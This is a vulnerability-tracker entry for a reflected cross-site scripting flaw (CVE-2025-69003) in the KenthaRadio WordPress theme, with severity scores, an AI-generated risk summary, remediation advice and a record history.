Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS.This issue affects KenthaRadio: from n/a through <= 2.2.0.
Published: 2026-01-22
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Improper neutralization of user-supplied data during web page generation allows an attacker to inject malicious script that executes in the target's browser. This reflected cross‑site scripting flaw (CWE‑79) can lead to session hijacking, cookie theft, defacement, or phishing attacks, compromising user confidentiality and site integrity.

Affected Systems

All instances of the QantumThemes KenthaRadio wordpress theme dated n/a through version 2.2.0 are affected. The vulnerability is present in every release of the theme up to and including 2.2.0, regardless of other plugins or wordpress core versions.

Risk and Exploitability

The CVSS score of 7.1 classifies this as a high‑severity flaw, yet the EPSS score of less than 1 percent indicates the likelihood of exploitation is very low. The flaw is not listed in the CISA KEV catalogue, further reducing immediate threat. An attacker would craft a malicious URL or input that is reflected back into the page, so the attack requires a victim to visit the manipulated resource, typically via a phishing link or social engineering. When a user follows the crafted URL, the injected script runs with the privileges of the victim, allowing the attacker to steal data or perform malicious actions.

Generated by OpenCVE AI on April 29, 2026 at 10:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the KenthaRadio theme to the latest version, which removes the XSS flaw.
  • Ensure that the theme sanitizes all user input before rendering it on the page, following best practices for escaping output.
  • If a theme update is not immediately possible, disable or remove the theme's components that echo unfiltered data, and consider switching to a different theme until a patch is available.

Generated by OpenCVE AI on April 29, 2026 at 10:49 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 28 Jan 2026 17:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 23 Jan 2026 16:45:00 +0000

Type Values Removed Values Added
First Time appeared Qantumthemes
Qantumthemes kentharadio
Wordpress
Wordpress wordpress
Vendors & Products Qantumthemes
Qantumthemes kentharadio
Wordpress
Wordpress wordpress

Thu, 22 Jan 2026 23:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS.This issue affects KenthaRadio: from n/a through <= 2.2.0.
Title WordPress KenthaRadio theme <= 2.2.0 - Reflected Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References

Subscriptions

Qantumthemes Kentharadio
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T20:31:21.645Z

Reserved: 2025-12-29T11:18:13.437Z

Link: CVE-2025-69003

cve-icon Vulnrichment

Updated: 2026-01-28T16:37:25.615Z

cve-icon NVD

Status : Deferred

Published: 2026-01-22T17:16:16.077

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-69003

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-29T11:00:10Z

Weaknesses